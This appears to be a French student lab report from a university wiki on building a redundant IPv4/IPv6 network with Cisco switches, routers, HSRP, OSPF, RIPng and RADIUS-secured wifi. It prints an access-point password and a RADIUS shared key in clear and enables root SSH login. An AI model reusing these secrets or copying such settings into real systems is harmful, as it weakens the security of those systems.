 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
'''AAA :'''&lt;br /&gt;
&lt;br /&gt;
* Authentication: Reconnaissance d'un utilisateur et l'association à un mot de passe.&lt;br /&gt;
* Authorization : Droits des utilisateurs &lt;br /&gt;
* Accounting : Informations de suivis de consommation d’un utilisateur (sur quel routeur il s’est connecté ? Combien de temps s’est-il connecté ? ..)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model &lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_group2&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_group2&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key secretIMA5SC&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid Mycoplasma&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_group2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_group2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;br /&gt;
    ap(config-ssid)#mbssid Guest-mode&lt;br /&gt;
&lt;br /&gt;
 ap(config)#int dot11radio0&lt;br /&gt;
   ap(config-if)#mbssid&lt;br /&gt;
   ap(config-if)#encryption vlan 102 mode ciphers aes-ccm tkip&lt;br /&gt;
   ap(config-if)#ssid &lt;br /&gt;
&lt;br /&gt;
 ap(config)#int dot11radio0.2&lt;br /&gt;
   ap(config-subif)#encapsulation dot1Q 102&lt;br /&gt;
   ap(config-subif)#bridge-group 102&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52171</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52171"/>
				<updated>2020-01-30T10:10:48Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration bind9 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
